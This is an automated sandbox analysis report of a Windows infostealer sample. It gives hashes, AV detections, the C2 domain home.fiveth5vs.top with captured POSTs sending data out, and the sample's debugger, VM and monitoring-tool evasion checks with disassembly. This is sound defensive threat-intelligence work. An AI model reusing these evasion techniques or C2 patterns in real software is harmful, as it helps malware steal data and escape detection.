
Windows Analysis Report
joE9s9sbv0.exe

Overview

General Information

Sample name: joE9s9sbv0.exe
renamed because original name is a hash value
Original sample name: 2ce78ac3287a074e14bd8b4af226fd09.exe
Analysis ID: 1582827
MD5: 2ce78ac3287a074e14bd8b4af226fd09
SHA1: 58500a1a439de84a870031062dd51e7cae982987
SHA256: 942897e237bc3ab9b597d9258e2541730d2192b957ea21c6242dc373b42dbc8f
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected non-DNS traffic on DNS port
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • joE9s9sbv0.exe (PID: 2788 cmdline: "C:\Users\user\Desktop\joE9s9sbv0.exe" MD5: 2CE78AC3287A074E14BD8B4AF226FD09)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched



AV Detection

Source: joE9s9sbv0.exe | Avira: detected
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl | Avira URL Cloud: Label: malware
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0 | Avira URL Cloud: Label: malware
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963 | Avira URL Cloud: Label: malware
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4 | Avira URL Cloud: Label: malware
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17 | Avira URL Cloud: Label: malware
Source: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737 | Avira URL Cloud: Label: malware
Source: joE9s9sbv0.exe | Virustotal: Detection: 48%
Source: joE9s9sbv0.exe | ReversingLabs: Detection: 56%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: joE9s9sbv0.exe | Joe Sandbox ML: detected
Source: joE9s9sbv0.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_0023A5B0
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0023A7F0
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_0023A7F0
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_0023A7F0
Source: joE9s9sbv0.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_001D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses | 0_2_001D255D
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_001D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle | 0_2_001D29FF
Source: global traffic | TCP traffic: 192.168.2.10:52116 -> 1.1.1.1:53
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1  Host: httpbin.org  Accept: */*
Source: global traffic | HTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1  Host: home.fiveth5vs.top  Accept: */*  Content-Type: application/json  Content-Length: 500830
Source: global traffic | HTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1  Host: home.fiveth5vs.top  Accept: */*
Source: global traffic | HTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1  Host: home.fiveth5vs.top  Accept: */*  Content-Type: application/json  Content-Length: 31  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d  Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_0029A8C0 recvfrom | 0_2_0029A8C0
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5vs.top
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND  server: nginx/1.22.1  date: Tue, 31 Dec 2024 14:42:11 GMT  content-type: text/html; charset=utf-8  content-length: 207  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND  server: nginx/1.22.1  date: Tue, 31 Dec 2024 14:42:13 GMT  content-type: text/html; charset=utf-8  content-length: 207  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17
Source: joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
Source: joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4
Source: joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963
Source: joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: joE9s9sbv0.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: joE9s9sbv0.exe, joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: joE9s9sbv0.exe | Static PE information: section name:
Source: joE9s9sbv0.exe | Static PE information: section name: .idata
Source: joE9s9sbv0.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_001E05B0
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_001E6FA0
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_0020F100
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_0029B180
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_0055E050
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_0055A000
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_002A00E0
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_00236210
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_0029C320
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_002A0420
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_00524410
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_001DE620
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_0029C770
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_00536730
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_0023A7F0
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_00554780
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_0028C900
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_001E4940
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_001DA960
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: String function: 00387220 appears 37 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: String function: 002150A0 appears 39 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: String function: 00214FD0 appears 87 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: String function: 003ACBC0 appears 36 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: String function: 00214F40 appears 138 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: String function: 001D73F0 appears 54 times
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: String function: 001D75A0 appears 244 times
Source: joE9s9sbv0.exe | Static PE information: invalid certificate
Source: joE9s9sbv0.exe | Static PE information: Section: wxhzupjp ZLIB complexity 0.9946275415735047
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: joE9s9sbv0.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: joE9s9sbv0.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Section loaded: kernel.appcore.dll
Source: joE9s9sbv0.exe | Static file information: File size 4508160 > 1048576
Source: joE9s9sbv0.exe | Static PE information: Raw size of  is bigger than: 0x100000 < 0x289a00
Source: joE9s9sbv0.exe | Static PE information: Raw size of wxhzupjp is bigger than: 0x100000 < 0x1bf400

Data Obfuscation

Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Unpacked PE file: 0.2.joE9s9sbv0.exe.1d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wxhzupjp:EW;vxbexiem:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wxhzupjp:EW;vxbexiem:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: joE9s9sbv0.exe | Static PE information: real checksum: 0x454169 should be: 0x45ba02
Source: joE9s9sbv0.exe | Static PE information: section name:
Source: joE9s9sbv0.exe | Static PE information: section name: .idata
Source: joE9s9sbv0.exe | Static PE information: section name:
Source: joE9s9sbv0.exe | Static PE information: section name: wxhzupjp
Source: joE9s9sbv0.exe | Static PE information: section name: vxbexiem
Source: joE9s9sbv0.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_005541D0 push eax; mov dword ptr [esp], edx | 0_2_005541D5
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_00252340 push eax; mov dword ptr [esp], 00000000h | 0_2_00252343
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Code function: 0_2_0028C7F0 push eax; mov dword ptr [esp], 00000000h | 0_2_0028C743
Source: joE9s9sbv0.exe | Static PE information: section name: wxhzupjp entropy: 7.955910297498214

Boot Survival

Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\joE9s9sbv0.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: 8DA186 second address: 8DA199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: 8DA199 second address: 8DA19E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: 8D99E9 second address: 8D99EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: A4DD45 second address: A4DD66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: A59EBA second address: A59EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: A59EBE second address: A59EC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: A59EC4 second address: A59ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: A59ECE second address: A59EF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 push ebx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: A59EF3 second address: A59EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: A59EFB second address: A59EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: A59EFF second address: A59F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe | RDTSC instruction interceptor: First address: A5A1E3 second address: A5A1E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D542 second address: A5D569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FDC0050BD57h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D569 second address: A5D5A9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jno 00007FDC00CE27B2h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FDC00CE27B7h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D5A9 second address: A5D5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDC0050BD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D5F8 second address: A5D6F2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jmp 00007FDC00CE27B4h 0x00000011 nop 0x00000012 mov edx, 5719D9E7h 0x00000017 push 00000000h 0x00000019 jmp 00007FDC00CE27AFh 0x0000001e call 00007FDC00CE27A9h 0x00000023 js 00007FDC00CE27BEh 0x00000029 push eax 0x0000002a jg 00007FDC00CE27B9h 0x00000030 jmp 00007FDC00CE27B3h 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jmp 00007FDC00CE27B5h 0x0000003e mov eax, dword ptr [eax] 0x00000040 jmp 00007FDC00CE27B9h 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 push edi 0x0000004a jnc 00007FDC00CE27A8h 0x00000050 pop edi 0x00000051 pop eax 0x00000052 mov esi, eax 0x00000054 push 00000003h 0x00000056 mov dword ptr [ebp+129E3090h], edi 0x0000005c jmp 00007FDC00CE27B0h 0x00000061 push 00000000h 0x00000063 mov edx, dword ptr [ebp+129E29EDh] 0x00000069 push 00000003h 0x0000006b mov dx, C07Ah 0x0000006f call 00007FDC00CE27A9h 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007FDC00CE27ABh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D6F2 second address: A5D716 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDC0050BD54h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D716 second address: A5D726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D726 second address: A5D740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D740 second address: A5D755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D755 second address: A5D791 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDC0050BD4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jng 00007FDC0050BD4Ch 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jmp 00007FDC0050BD50h 0x0000001b popad 0x0000001c popad 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push edi 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D791 second address: A5D7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop eax 0x00000007 lea ebx, dword ptr [ebp+12B67468h] 0x0000000d mov esi, ecx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D7A7 second address: A5D7B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D86A second address: A5D8B2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDC00CE27A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDC00CE27B8h 0x00000010 nop 0x00000011 jmp 00007FDC00CE27ADh 0x00000016 push 00000000h 0x00000018 sbb edx, 087AD89Ah 0x0000001e call 00007FDC00CE27A9h 0x00000023 push esi 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8B2 second address: A5D8BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
